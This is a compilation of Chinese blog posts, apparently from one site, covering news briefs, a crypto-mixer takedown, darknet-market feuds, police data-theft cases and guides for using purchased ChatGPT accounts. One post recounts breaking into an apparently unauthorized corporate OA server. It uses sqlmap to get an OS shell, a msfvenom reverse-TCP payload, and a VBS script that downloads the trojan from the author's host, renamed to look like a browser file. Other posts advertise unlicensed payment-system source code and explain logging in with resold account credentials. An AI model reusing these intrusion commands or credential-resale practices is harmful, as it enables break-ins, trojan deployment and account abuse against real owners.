3月18日，农历二月二十七，星期六 在这里，每天60秒读懂世界！ 1、文旅部等拟规定：严禁电竞酒店违规接待未成年人； 2、上海迪士尼17日起暂停发售年卡，已持有年卡的游客仍可续期。此前曾称下半年将涨价； 3、中国成品油价迎年内第二次下跌：92、95号汽油、0号柴油每升均下调0.08元，加满一箱油约少花4元； 4、北京：今年北京体育中考调整为合格考，参与即满分；广州：清明祭扫仍实施预约措施，可通过“广州市清明祭扫预约平台“进行预约； 5、成都推促进汽车消费活动：龙泉驿区单车累计补贴最高15万，活动持续至6月底。经销商：属实，预计细则很快出来，参与车型应该是成都造； 6、河北邯郸一初三学生罚站时倒地身亡，家属发声：站了20多分钟后倒地，老师没有扶，当地教育局：刑警队已介入调查； 7、福建：厦门、福州到香港西九龙高铁4月1日起恢复开行，18日即可购票； 8、网曝有多名现役球员被抓，有国脚在内，据媒体人苗原消息：已经有人出来了，配合调查，不是人人有罪； 9、央行：决定3月27日下调金融机构存款准备金率0.25个百分点。预计释放超5000亿元中长期资金； 10、外媒：埃尔多安与芬兰总统尼尼斯托会晤后称，土耳其已决定启动批准芬兰加入北约进程； 11、美媒：美批准澳大利亚购买220枚“战斧“导弹，与核潜艇“配套“，总额达13亿澳元(约合60亿人民币)；美国国务院批准向波兰出售800枚“地狱火“导弹等，总值1.5亿美元； 12、美媒：隐瞒数月后，美国密西西比河上游一核电站承认在去年11月21日发生150万升放射性污水泄漏事故。当地官员：没扩散，对公众健康安全没风险； 13、韩媒：美韩20日至4月3日将举行5年来首次大规模联合登陆作战演习，届时，英国也将派兵参演；朝鲜公布“火星炮-17“型洲际弹道导弹发射训练画面：于16日发射，上升高度为6045公里，飞行距离达1000.2公里； 14、美官员：俄方可能已经打捞到一些MQ-9无人机的小碎片；外媒：俄罗斯就黑海“撞机“事件向苏-27战机飞行员颁奖；波兰、斯洛伐克宣布：向乌克兰提供米格-29战斗机！俄罗斯：都将被摧毁！美官员：战斗机在乌毫无价值； 15、当地16日，美国多家银行向第一共和银行注资300亿美元，当天稍早时，其股价曾一度暴跌超35%；俄杜马主席：建议各国去美元化，以免遭美国银行业危机波及；外媒：瑞士信贷集团危机冲击国际银行业； 【微语】所有的愤怒，基本上都源自于没钱；不要老在别人面前倾诉你的困境和袒露你的脆弱，不要想着依靠别人，努力赚钱，这与年龄无关。...

德国调查人员成功地打击了暗网上最大的洗钱服务之一。正如德国联邦刑事警察局BKA周三宣布的那样，他们与美因河畔法兰克福的总检察长办公室一起查封了Chipmixer平台设在德国的四台服务器，查获了约7TB的数据，以及目前价值相当于约4400万欧元的比特币（约1909.4个比特币）。 对于调查人员来说，这是一个巨大的成功：Kirin博客发现，这是迄今为止BKA查获的加密货币资产数量最多的一次。 加密货币混合器Chipmixer ChipMixer是一家成立于2017年年中的无牌加密货币混合器，专门从事与虚拟货币资产相关的混合或切割服务。ChipMixer软件阻断了资金的区块链踪迹，使其对希望清洗贩毒、武器贩运、勒索软件攻击和支付卡欺诈等犯罪活动的非法所得的网络犯罪分子具有吸引力。存入的资金将变成“chips”（具有同等价值的小代币），然后将它们混合在一起——从而匿名化所有初始资金来源的踪迹。 ChipMixer是一项在明网和暗网上都可用的服务，为他们的客户提供完全匿名的服务。这种类型的服务通常在犯罪分子将清洗过的加密货币资产转到加密货币交易所之前使用，其中一些交易所也为有组织的犯罪活动服务。在清洗流程结束时，“清理过”的加密货币可以轻松地兑换成其他加密货币，或通过ATM或银行账户直接兑换成法定货币。 Chipmixer是这样工作的：存入的加密货币资产被分成统一的小数额——所谓的“chips”。然后将这些筹码混在一起以掩盖资金的来源。因为比特币、以太坊和大多数其他公共区块链是透明的，所以这种形式的“隐私”很难实现。通过这种方式，Chipmixer向其客户保证完全匿名。 暗网市场Hydra Market的收益与倒闭的交易所FTX的被盗资金都在Chipmixer的“客户”之列 BKA估计，自2017年以来，Chipmixer已经清洗了大约15.2万个比特币或27.3亿欧元的加密货币资产，其中很大一部分与暗网市场、勒索软件集团、非法商品贩运、儿童性剥削材料的采购以及被盗的加密资产有关。 除其他事项外，调查人员正在调查来自资不抵债的美国加密货币交易所FTX被盗的部分加密货币是否也在这里被清洗的嫌疑。FTX在去年11月申请破产，这在加密货币市场引起了巨大的冲击波。 警方已经发现暗网平台“Hydra Market”通过Chipmixer清洗了价值数百万欧元的交易，BKA于2022年4月关闭了这个贩卖毒品、被盗数据或伪造文件的非法暗网市场。Zeppelin、Suncrypt、Mamba、Dharma或Lockbit等勒索软件参与者也使用Chipmixer的服务洗钱他们收到的赎金。 加密货币混合器建立匿名性 加密货币混合器的服务本身并不违法。通过混合许多用户的加密货币来掩饰资金的来源和所有权，混合器创造了匿名性，一种“金融隐私”，这对于生活在压制政权下的人们来说也很重要。 但是，BKA通常警告不要使用加密货币混合器，因为这些服务可能会支持洗钱者。用户更应该依赖遵守洗钱规定的经批准的加密货币交易所。 犯罪分子对混合器特别感兴趣，因为他们可以利用混合器来掩盖持有黑客和欺诈行为所得资金的加密货币钱包与用于兑换法定货币的钱包之间的联系。通过这种方式，他们可以避免触发洗钱警告。 美国当局正在严厉打击 据Chainalysis的密码取证专家的说法，2022年通过混合器的78亿美元中，有近四分之一用于非法用途。一段时间以来，美国当局尤其关注这些服务。 2022年5月，美国财政部外国资产控制办公室（OFAC）对加密混合器Blender.io实施制裁，随后于8月对以太坊混合器TornadoCash实施制裁。两者都与朝鲜黑客有关，据美国联邦调查局称，朝鲜黑客实施了多次加密货币黑客攻击。此后，这两个混合器的使用被禁止，并被起诉。 早在2021年，美国司法部（DoJ）逮捕了Bitcoin Fog的运营商，并指控他犯有洗钱等罪名。比特币混合器Helix的运营商承认了洗钱阴谋，并同意被没收4400多个比特币。 BKA希望进一步调查追踪 在调查Chipmixer期间，BKA、司法部、联邦调查局、国土安全部和欧洲刑警组织之间也进行了密切的交流。 显然，德国没有逮捕任何人。然而，所谓的主要嫌疑人被联邦调查局查明并列入通缉名单，并悬赏了他的人头。德国联邦刑事警察局现在希望使用没收的数据集来制定进一步的调查方法，以推进对网络犯罪进一步的调查。 欧洲刑警组织促进了国家当局之间的信息交流，并支持行动的协调。欧洲刑警组织还提供分析支持，将现有数据与欧盟内外的各种刑事案件联系起来，并通过运营分析、加密追踪和取证分析支持调查。欧洲刑警组织的联合网络犯罪行动特别工作组（J-CAT）也支持该行动。这个常设行动小组由来自不同国家的网络犯罪联络官组成，他们从事高知名度的网络犯罪调查。 涉及的国家主管部门 比利时：联邦警察德国：联邦刑事警察局和法兰克福总检察长办公室波兰：中央网络犯罪局瑞士：苏黎世州警察局美国：联邦调查局、国土安全调查局、司法部...

根据卡密的分割格式，将账号和密码 提取出来，API 不是开发者用不上，可以忽略 例：收到的卡密如下↓ [email protected] – – – – 123456 – – – – sk-99999999999999999999999 上面是你收到的卡密，去掉分割符号提取出来如下： 账号：[email protected]，密码：123456，APIkey：sk-99999999999999999999999   正确提取账号后，我们开始登陆 打开 https://chat.openai.com/ 选择登陆 log in 然后选择微软账号登陆   这时会跳转到登陆页面 输入我们的卡密里的账号 和密码登陆  到这一步，部分人会出现 账号被锁定的情况，请在博客查看其它相关文章 如果可以正常登陆，就继续下一步~   如果登陆成功，会提示绑定辅助邮箱， 这里都推荐绑定一下  出现这个登陆状态，可选，选了就可以保持登陆，不用每次都登陆 这个密码验证也是可选。不想弄直接点：不，谢谢 跳过 然后就登陆进入 ChatGPT 了。 修改密码，看这博客其他文章...

邮箱登陆地址： https://oauth.gazeta.pl/poczta/auth   打开后，输入我们购买卡密中的账号密码，即可登陆邮箱   登陆后，点击左侧 Ustawienia 按钮 然后点击 Edycja danych，会跳转到修改页面 更改密码 看不懂的，可以用浏览器翻译一下，就都是中文了 填写旧密码和新密码即可修改   设置备用邮箱和密保问题   可以设置添加备用邮箱，还有安全问题 ...

要想登陆使用 CHatGPT，首先需要有以下条件 1. 质量过关的梯子！非常重要 2. 谷歌浏览器 3. 开全局模式（如果不懂，去咨询梯子的客服如何设置）4. 清除浏览器缓存（不是历史记录、是浏览器缓存） 5. 打开：https://chat.openai.com 如果你不能打开这个链接，不能看到如下页面，就是还没有解决网络问题！ Gazeta.pl 邮箱修改密码，请看文末   关于账号密码： 购买后，会收到到卡密，卡密是按 - – – - 分割 账号 – – – – 密码 – – – -apikey 将账号和密码提取出来， 密码是邮箱密码 也是 CHatGPT 的密码，两个都一样 收到的账号密码，是可以直接登陆 CHatGPT 的！但还是建议收到了都去修改一下~   CHatGPT 登陆教程： 官网登陆入口：https://chat.openai.com 打开后，选择 log in 登陆，不是旁边那个 sign up，那个是注册！！ 有些小可爱一直在点注册，还一直来问为什么提示错误~~~   然后输入自己获得的账号，点击 continue，输入密码即可登陆~  ...

3月14日，人工智能公司OpenAI发布了ChatGPT（GPT-3.5阶段）的升级版GPT-4，让原本已经略显沉寂的 ChatGPT 话题再次迎来了“爆炸式热议”，毫无悬念地冲上了社交平台热搜。“AI 终将取代人类”、“GPT-4考试能力强过90%的人类”等话题受到越来越多的用户关注。   和之前的ChatGPT相比，此次GPT-4的升级堪称“重磅级”：采用了“超大多模态模型”，回答准确率上大幅提升；输出文本扩写能力增强，处理上限增加至2.5W个单词；在纯文本输入基础上增加了图像识别；创造力大幅提升，能够处理更细微的指令......   和ChatGPT相比，GPT-4是如此之优秀，带来的可怕结果是：在用户的疯狂订购下，OpenAI付款系统宕机了。 扔掉Chat之后，GPT-4更强大了   如果说基于GPT-3.5模型的ChatGPT还是个在及格线徘徊的“差生”，那么GPT-4的实力则有望踏入“尖子生”行列，不仅更加智能，也更加难以被“欺骗”。   扔掉Chat的前缀后，GPT-4能力发生了明显的变化。简单来说，随着OpenAI在深度学习方向上的不断扩展，GPT-4朝着“更像人”的方向迈出了一大步，它甚至参加了美国律师资格考试 Uniform Bar Exam、法学院入学考试 LSAT等，成绩排在前20%；还有用户在 YouTube上进行直播用GPT-4写文章、写代码、报税、写诗、讲笑话……   通过对26种语言进行测试，GPT-4在24种语言方面的表现均优于GPT-3.5等其他大语言模型，包括拉脱维亚语、威尔士语和斯瓦希里语等低资源语言，其中对中文识别的准确性达到了80.1%。     OpenAI演示了一段用GPT-4用26个单词写作的《灰姑娘》故事梗概，其中这26个单词的首字母正好对应26个字母从A到Z的正确排序，足以证明GPT-4在词汇量及语言创作方面能力的强大。     但最大的更新之处，在于GPT-4在图片识别方面的支持，能够在读懂图片内容的基础上，给出有逻辑的回答。比如当用户问下图有何特别之处，GPT-4能够直接描述出是“一名男子正在行驶中的出租车车顶上的熨衣板上熨烫衣服”。   在另一个例子中，GPT-4能够按照用户要求，在“读懂”论文的基础上给出摘要，并能对其中的某个试验过程进行精简的描述。     此外，GPT-4还能在一定程度上读懂网络上流行的搞笑“梗图”，比如能够描述出下图的搞笑之处在于“将过时的大型 VGA 连接器插入小型现代智能手机充电端口的荒谬做法”。   GPT-4将会成为黑客手中的利剑？   首先我们必须意识到一个问题，越来越智能的GPT-4会不会带来更加可怕的安全风险，或者成为网络犯罪组织手中的“利剑”？   在ChatGPT版本，FreeBuf曾深入探讨其在网络犯罪方面被利用的情况，以及可能给网络空间带来的安全风险。   一是其本身的风险，例如安全专家在ChatGPT生成的内容中发现了与公司内部机密十分相似的文本，原因可能是亚马逊员工在使用ChatGPT生成代码和文本时输入了公司内部数据信息。那么，在GPT-4中，这样的安全隐患将会仍旧存在，各大巨头依旧会对GPT进行防守。   在网安政策方面，GPT-4同样面临踩红线的危险。例如是否违反了GDPR的“最小数据”原则，是否满足“被遗忘权”或“删除权”，对于公共数据的使用是否合规，对于学术型、知识产权型信息的收集适合符合当前的法律、法规。   目前，我国《网络安全法》《数据保护法》《个人信息保护法》对于数据的采集、使用都有细致的规定，仅从现有的情况来看，GPT-4显然无法全部满足这些要求。而且未来全球的法律体系将朝着“数据保护”的方向进一步细化，那时GPT将面临更加严峻的合规压力。   其次是使用GPT-4编辑代码可能存在更多隐蔽的漏洞，在ChatGPT-3.5阶段，已经有企业和开发人员尝试利用它来写代码和漏洞排查。在卡巴斯基的一项实验中，分析师发现ChatGPT 可用于为未运行端点检测和响应 (EDR) 系统、检测代码混淆或逆向工程代码二进制文件的公司收集取证信息。   而更智能的GPT-4也被很多人给予厚望，当越来越多的开发人员使用GPT-4来编写代码，其中隐藏的漏洞将会成为更加可怕的定时炸弹，一旦被攻击者利用，将会给整个网络安全空间带来难以言表的灾难，尤其是在供应链安全领域需要提高警惕。   最后，如何防止GPT-4被黑客利用，从而给网络安全防御带来新的压力。一个十分明显的事实是，从ChatGPT 阶段开始，GPT 被用于黑产、网络犯罪、黑客攻击等领域的案例越来越多，未来甚至有可能成为常态。   例如Cybernews的研究人员曾发现，ChatGPT可以被黑客用于寻找网站的安全漏洞，在其帮助下，研究人员对一个普通网站进行了渗透测试，并在45分钟内结合ChatGPT提供的建议和代码更改示例完成了破解。   ChatGPT已经具备这样的能力，更何况更加智能的GPT-4？短时间想要利用GPT-4对网络安全体系产生实质性的强化似乎难以实现，但是被用于网络犯罪却已是近在眉睫，类似的安全风险该如何处理已经成为当下必须要思考的问题。   当然，在安全方面OpenAI也在持续努力。例如他们聘请了50 多位来自人工智能对接风险、网络安全、生物风险、信任和安全以及国际安全等领域的专家对模型进行对抗性测试，训练各种高风险场景，从而为缓解措施和模型的改进提供依据。例如通过搜集额外专业数据，以提高GPT-4拒绝有关如何合成危险化学品请求的能力。   但仅依靠这些，很明显无法满足安全的诉求，这也意味着我们需要从多方面入手来增强，以GPT-4为代表的人工智能在安全方面的能力，包括制定政策法规、以技术手段遏制作恶的风险等。   写在最后   无论如何，科技的进步对于人类的发展有着不可估量的作用，但与此同时我们更需要对风险有清晰的认识。换言之，我们以积极的态度拥抱GPT-4，但是我们更要做好应对风险的准备。   正如二战某领袖所说的那样：我们改变不了别人的想法，既然他们要备战，我们也要备战。对于GPT-4也是如此，我们无法改变他人用它来“作恶”，但我们可以决定如何用它来“为善”。   AI 这把剑，握在网安人的手里，同样异常锋利。   我们做好准备！  ...

彩虹易支付源码最新版免授权2.0版本前台模板美化+前台用户中心美化版 在原来的基础上前后端都做了美化，结合了上个版本的前台模板美化 这次更新了前台用户中心美化2.0版本 ...

  按照公安部统一部署，全国公安机关网安部门聚焦人民群众反映强烈的各类侵犯公民个人信息违法犯罪活动，依托“净网2022”专项行动，坚持“追源头、打内鬼、端平台”，持续开展严厉打击侵犯公民个人信息犯罪工作，破获一批重大案件，抓获一批犯罪嫌疑人，取得明显成效，有力维护了网络空间安全和社会公共安全。公安部今日公布打击侵犯公民个人信息犯罪8起典型案例。 1、四川公安机关破获王某等人侵犯公民个人信息案。四川公安网安部门侦查查明，犯罪嫌疑人王某等人为牟取非法利益，成立3家助贷催收公司，组建技术团伙利用技术手段非法获取公民个人信息，并以此开展助贷业务，非法获利1000余万元。四川公安机关先后抓获犯罪嫌疑人189名，查获各类非法获取公民个人信息软件工具104款，查获公民个人信息数据一批。 2、江苏公安机关破获黄某等人利用木马程序非法获取公民购物信息案。江苏公安网安部门侦查查明，犯罪嫌疑人黄某等人，勾结快递公司内部员工，通过在公司内部电脑安装木马程序等方式，窃取物流寄递信息，并向境外诈骗分子出售，非法获利2500余万元。江苏公安机关先后抓获犯罪嫌疑人60名，查获快递面单信息数据一批。 3、山东公安机关破获石某等人非法获取公民车辆位置信息案。山东公安网安部门侦查查明，犯罪嫌疑人石某等人成立找车公司，利用技术手段入侵部分停车场收费平台系统，非法获取车辆位置信息并出售，非法获利7000余万元。山东公安机关先后抓获犯罪嫌疑人64名，查获车辆位置信息数据一批。 4、辽宁公安机关破获黄某等人非法获取老年人个人信息推销虚假保健品案。辽宁公安网安部门侦查查明，犯罪嫌疑人黄某成立公司，勾结他人利用技术手段非法获取中老年人信息，组建电话推销团队，通过夸大疗效等话术推销假冒伪劣保健品实施诈骗32万余人次，非法获利350余万元。辽宁公安机关先后抓获犯罪嫌疑人19名，收缴假冒伪劣保健品10余吨，查获相关老年人个人信息一批。 5、内蒙古公安机关破获周某等人非法获取公民人脸信息解封网络账号案。内蒙古公安网安部门侦查查明，犯罪嫌疑人周某等人勾结境外诈骗团伙，非法获取公民人脸信息，为境外诈骗团伙提供账号解封服务，非法获利10余万元。内蒙古公安机关先后抓获犯罪嫌疑人3名。 6、浙江公安机关破获邱某非法获取公民个人信息案。浙江公安网安部门侦查查明，犯罪嫌疑人邱某利用职务之便，使用技术手段非法获取某支付软件用户信息，并伙同他人在境外网上出售，非法获利20余万元。浙江公安机关先后抓获犯罪嫌疑人2名，查获公民个人信息一批。 7、河北公安机关破获刘某等人非法获取公民个人信息案。河北公安网安部门侦查查明，犯罪嫌疑人刘某作为某金融公司负责人，为开展贷款业务，非法向物业公司、银行、保险公司、电信运营商等行业内部人员购买大量有贷款需求人员个人信息，组织员工假冒银行工作人员推销贷款服务，并将公民个人信息转卖，非法获利630余万元。河北公安机关先后抓获犯罪嫌疑人63名，查获公民个人信息一批。 8、江苏网安部门破获石某等人非法获取公民个人信息案。江苏网安部门侦查查明，犯罪嫌疑人石某等人勾结某电力企业外包服务公司工作人员孙某等人，窃取用电居民房产信息，并出售给房屋中介、装修公司人员，非法获利30余万元。江苏公安机关先后抓获犯罪嫌疑人220余名，查获公民个人信息一批。 全国公安机关网安部门将全面贯彻落实党的二十大精神，严格依照《刑法》《个人信息保护法》《数据安全法》等法律法规相关规定要求，持续严厉打击侵犯公民个人信息违法犯罪，积极会同有关部门进一步完善打击危害公民个人信息和数据安全违法犯罪长效机制，加强有关行业信息系统安全防护和内部人员管理，提高公民个人信息安全保护意识，全力守护网络数据安全，切实维护人民群众合法权益。   ...

  3月16日，农历二月二十五，星期四 在这里，每天60秒读懂世界！ 1、中伊俄等国3月15日至19日将在阿曼湾举行“安全纽带-2023“海上联合军事演习； 2、官方：6月1日起，我国将施行电信领域违法行为举报处理新规； 3、网传安徽牌照货车司机在四川万源服务区死亡多日，警方：遗体被家属带回，死亡原因暂时不清楚。死者儿子称其生前在吃降压药； 4、中国海警：3月15日，依法驱离日方非法进入我钓鱼岛领海船只； 5、国际原油价格持续暴跌，预计国内油价将因对应调整幅度不足每吨50元而不做调整，国内成品油或迎年内第三次调价搁浅； 6、国家卫健委拟规范家庭托育点：面向3岁以下婴幼儿，收托不超5人； 7、洪都拉斯总统称指示外长寻求与北京建立外交关系，外交部：欢迎。台媒：投下震撼弹； 8、外媒：应土耳其总统埃尔多安邀请，芬兰总统将于16日访问土耳其。土媒：土耳其准备批准芬兰加入北约的申请；外媒：伊朗高官将于周四访问阿联酋； 9、外媒：当地15日凌晨，巴西北里奥格朗德州的多个城市发生暴力袭击事件，已造成1死2伤，有28人被捕；当地15日清晨，哥伦比亚煤矿发生爆炸事故，已致11人死亡，事故发生时共有30余人在矿井内； 10、有“末日博士“之称的鲁比尼周三警告称：瑞士信贷银行可能“太大不能救“，不排除倒闭风险。瑞士信贷当日跌近30%，续创历史新低，市值跌至不足80亿美元； 11、马拉维政府15日称：热带气旋“弗雷迪“对该国造成的死亡人数已上升至225人； 12、朝中社：朝鲜14日进行导弹示范射击训练，发射两枚战术弹道导弹； 13、外媒：瓦格纳联合部队击毙乌两名指挥官，乌军：一线战斗人员生命很少超三天；外媒：美国调查记者西摩·赫什最新发声，称若乌军失败，美可能直接介入俄乌冲突； 14、外媒：英德战机于14日在爱沙尼亚领空附近联合拦截一架俄罗斯飞机，目前尚无证据表明此事与美军无人机在黑海上空坠毁有关联； 15、外媒：当地14日，美军称其“MQ-9“无人机在黑海被俄军“击中坠毁“，俄国防部否认：称是因其自身大幅机动，导致失控坠毁。俄大使：不希望与美对抗；乌外长：只要俄方控制克里米亚，美无人机坠毁这类事件就不可避免； 【微语】能为野心买单的只有努力，但也记得人生平安健康，已是不枉此行。...

目前，“暗网中文论坛与长安不夜城”是最大的两个中文暗网交易市场，两个市场发布的违法商品的相似度与重复率也较高，基本上算得上是头号冤家、死对手。 前几日，有网友告诉小编，称“暗网中文论坛”（老“暗中”）在使用说明里称“长安不夜城”为虚假交易网站。今日，“长安不夜城在Telegram频道以及网站公告里”反讽“暗网中文论坛”为发个商品都要交钱的诈骗平台。骂战已经上演，暗网网友可跟随小编登台看戏。。 首先，“小编”带大家看看“暗网中文论坛”的表述，其在网站的使用说明中加了几段话： 用户反映, 站内曾经的一个数据商, 建电报群与搜索群, 表网架设自导自演的[暗网导航站], 暗网开设名为[长安不夜城]虚假交易网站.此人对暗网中文论坛进行恶意诋毁, 以”买家卖家”身份控诉本站无法提币, 投诉得不到解决等, 以骗取他人进入他们的诈骗网站. 请站内用户注意风险.电报Telegram有官方公开的API接口, 控制管理电报群很简单, 廉价的东南亚美国的虚拟电话电报账号伪造成万人大群.在表网架设网站, 可见网站方多么急于求成. 用cloudflare代理转发试图隐匿主机, 在执法部门面前好比捂住自己双眼.此人中国大陆身份, 近三年大陆疫情导致国际邦交恶化, 疫情淡化后中国执法部门重新对接国际刑警组织, 此网或许成为下一个暗网诈骗的典范.请用户规避风险.如果非要进入此站, 请把浏览器安全等级设置为最高. 否则你的浏览器将强制接受执行执行对方网站代码中的JavaScript. 国际刑警组织怎么找人?有了国际执法令后, cloudflare交出主机IP找到主机商, 向硬盘植入代码, 无痕操作拿下系统维护者登录IP, 根据来源找上一家网络公司, 逐级溯源protonmail在国际执法令下交出域名邮件的登录IP, 同理溯源.电报IPI获取此人的telegram_id, 国际通缉令提交到新加坡电报数据中心, 获取登录的代理地址, 如上.以上信息提示您, 只有洋葱路由(或其它多级加密)下的网站, 才叫暗网, 暗网组织不会在表网行事, 暗网中, 您的隐私第一重要. 目前无法判断“暗网中文论坛”以上言论里的“自导自演的[暗网导航站]”是否是“onion666暗网导航”，但小编判断大概率是，因为“长安不夜城”在“onion666暗网导航”投放了广告。 “暗网中文论坛”的言论称，“onion666暗网导航”与“长安不夜城”是其站内曾经的一个数据商“开设的，建了电报群与搜索群，还对暗网中文论坛进行恶意诋毁”，其判断这个数据商系“中国大陆身份”，这两个网站是“诈骗网站”。 “暗网中文论坛”的言论科普了一些技术，指出了Kirin博客曾经评价过“长安不夜城”的一个问题：那就是需要使用Javascript；另外还解释了警方怎么利用网站、邮箱、Telegram来追踪暗网，有些许技术含量，但说的不是很清楚。 接着，“Kirin博客”去“长安不夜城”看看其回应： 最近某暗网老牌诈骗平台专门修改页面诋毁长安不夜城，连长安的网页都没打开过就信口开河，说得是老母猪戴胸罩——一套又一套。谁他妈是你的数据商？你跟谁俩呢？就你这发个商品都还要交钱的屌诈骗平台？还一会暗网交易市场一会暗网中文论坛的，先把自己的定位搞清楚！你就一老牌诈骗平台，先是借用户名改ID的名义诈骗用户资金，后来又敲诈老客户巨额手续费，要不是楼兰和茶马跑路了你以为你还能活到现在？还tm表网？我看你自己就是个婊王。控制电报群很简单？你有本事就建一个，光会吹牛逼，还扯什么国际刑警，TOR就美国海军开的，你就一蝙蝠身上插鸡毛——你算什么鸟？国际刑警看得起你个屌毛？别把自己看得太高，咱们走着瞧 “长安不夜城”以上言论带了一些脏话，反映了其管理员的震怒。其直接称“暗网中文论坛”在“诋毁长安不夜城”，并且不承认是“暗网中文论坛”的数据商。 “长安不夜城”的反击言论称，“暗网中文论坛”是“一老牌诈骗平台“、”先是借用户名改ID的名义诈骗用户资金，后来又敲诈老客户巨额手续费”，并称要不是“楼兰城”和“茶马古道”跑路了，“暗网中文论坛”根本不可能“活到现在”。   更多暗网新闻动态，请关注Kirin博客。...

0x01 发现漏洞 七月正值暑假，闲暇时光在百度上inurl一番，找到了一个古老的企业OA系统 IP站点，没有域名，扫过一眼，.NET流行时代的普遍漏洞浮现在脑海里——SQL注入 在用户名里输入admin’，不负期望地报了错 很明显，前后端都没有对用户的输入进行过滤，直接将’带入了SQL语句进行。初步判断，此OA系统存在SQL注入漏洞。 0x02 漏洞验证 打开BurpSuite，设置好浏览器代理，抓下HTTP请求，一气呵成。 问题参数为 txtLogin=admin%27，可将整个请求复制到 test.txt，使用sqlmap -r 来注入   sqlmap -u http://x.x.x.x/xx.aspx --forms 至此，可以确认存在error-based、stack quires和time-based三个类型的漏洞 0x03 判断数据库用户的权限 发现SQL注入后，首先要判断权限，高权限的注入可以为后续渗透省下很大功夫   sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba 非常nice，再次不负期望地返回了DBA权限，输入以下命令，获得一个shell   sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell NT/SYSTEM权限，时隔两个多月，复现有误，不予贴图 0x04 反弹shell 深入内网 生成一个shell   msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe   由于环境艰难，不能直接上传文件，我选择了用vbs脚本来下载木马到服务器   代码如下： Set post=CreateObject("Msxml2.XMLHTTP")post.Open "GET","http://x.x.x.x/shell.exe"'发送请求post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()'等待3秒，等文件下载wscript.sleep 3000 aGet.Write(post.responseBody)'写数据aGet.SaveToFile "shell.exe",2 用echo命令缓慢地写完了vbs脚本之后，顺利运行，下载了木马 更改名字，移动到IE安装目录进行伪装 start iee.exe 运行木马，metasploit成功收到了SYSTEM权限的shell   该主机拥有内网IP，存在内网，可以互通，并且该主机作为中央数据库 网主机皆为VMware虚拟机 0x05 结束测试，提交漏洞 本次渗透测试成功拿到最高权限， 到此为止，不再深入。随着攻击与防御技术的彼此攀升，程序员的安全意识逐渐提高，SQL也越来越少。 但不少粗糙的程序和古老的系统仍然存在此漏洞，此类漏洞解决方法简单，只用对用户输入参数稍加处理即可.  ...

小红书被曝删除用户手机照片！最新回应→ 手机安装App时，总会要求用户授权各种各样的权限。授权的权限被合理规范使用倒还好，假如App利用权限私自操作大家手机里的隐私数据是不是想想就后怕？ 近日，有网友反馈手机系统提示“小红书试图删除您的照片” 据网友发布视频显示：手机“已自动拦截该行为” 对此，小红书技术REDtech回应称：第一时间进行核实，回复如下： 小红书App并未删除用户手机中的原图片，而是清理了用户在使用App时，生成的临时缓存，用户在使用某些版本小红书App的部分功能时，系统可能会生成临时缓存文件以便于使用，用户完成相应操作后，系统会自动清除，以避免占用用户手机存储空间。 有网友认为App管得太多了不应该给App权限 也有网友表示：不开权限没法使用这个App很无奈 部分网友称：要看删除的是App自己生成的图片 还是用户相册里自己拍的照片 其实，除小红书外， 曾有多家知名平台曝出类似情况。 之前也报道过，2022年11月，有网友称自己在得物APP上买了东西，发现有问题，就向平台反映并上传视频。随后，他的手机提示，得物删除了视频。戳图见详细报道?2021年1月，有用户称拼多多将其手机相册里的照片证据删除，被手机系统检测到。2021年10月，有网友称其保存在手机相册的图片无故被豆瓣App删除，需要从回收站内才能找回。针对近年来许多手机应用对于手机使用权限要求越来越多的现象，包括小米、华为等手机厂商推出了包括应用权限使用查看、应用权限监控等在内的诸多功能，保护用户手机数据安全。 假冒Chat GPT导致数千个 Facebook 账户信息泄露 近期，已发现假冒的 ChatGPT 品牌 Chrome 浏览器扩展程序具有劫持 Facebook 帐户和创建流氓管理员帐户的功能。 Guardio Labs 研究员 Nati Tal在一份技术报告中说：“通过劫持备受瞩目的 Facebook 商业账户，威胁者创建了一支由 Facebook 机器人和恶意付费媒体设备组成的精英军队。这使得它能够以一种自我传播的蠕虫般的方式，以牺牲受害者的利益为代价来推送 Facebook 付费广告。” 据称自2023年3月3日以来每天吸引2,000次安装的“快速访问聊天GPT”扩展程序自2023年3月9日起被谷歌从Chrome网上应用店中撤下。 浏览器插件通过 Facebook 赞助的帖子进行推广，虽然它提供了连接到 ChatGPT 服务的能力，但它也被设计为使用已经激活的、经过身份验证的会话秘密收集 cookie 和 Facebook 帐户数据。 这是通过使用两个虚假的 Facebook 应用程序——portal 和 msg_kig——来维持后门访问并获得对目标配置文件的完全控制来实现的，并且将应用程序添加到 Facebook 帐户的过程是完全自动化的。 然后，被劫持的 Facebook 商业帐户被用来为恶意软件做广告，从而有效地扩大了其 Facebook 机器人大军。 发展之际，威胁行为者正利用 OpenAI 的 ChatGPT 自去年底发布以来的广泛流行来创建人工智能聊天机器人的虚假版本，并诱使毫无戒心的用户安装它们。 上个月，Cyble披露了一项社会工程活动，该活动依靠非官方的 ChatGPT 社交媒体页面将用户引导至下载信息窃取程序的恶意域，例如RedLine、Lumma和Aurora。还发现了通过 Google Play 商店和其他第三方 Android 应用商店分发的虚假 ChatGPT 应用程序，将SpyNote 恶意软件推送到人们的设备上。 病毒式人工智能工具的成功也引起了欺诈者的注意，他们利用该技术对粗心的互联网用户进行高度复杂的投资诈骗。   ...

不交保证金、不违禁内容，提供身份证、手机号、银行卡，就能赚钱？ 孩子开学了，全职宝妈在家无聊，求个不耽误送孩子的兼职~ 加入我们吧！不交保证金、不违禁内容、安全可靠，入职就有基础工资。 那么好，怎么办理入职？基础工资多少？需要做什么工作？ 我们是兼职线上出纳工作，提供身份证、银行卡、手机号登记入职！介绍朋友入职提成200！ 近日，山东泰安市民李女士就碰到了这么一件事。家里孩子入学后，她想找一份不耽误接送孩子的兼职工作。看到有人推荐不交保证金、不违禁内容，提供身份证、手机号、银行卡入职就有基础工资和分红的时候，李女士心动了。为了尽快办理入职，李女士到银行开办新的银行卡，在办卡过程中，看到了“帮信”犯罪和“两卡”整治的宣传片。这一看啊，好市民李女士真走脑子了，觉得自己这份兼职不太对劲，起了疑心，于是到辖区派出所咨询，发现自己险些涉嫌“帮信罪”。 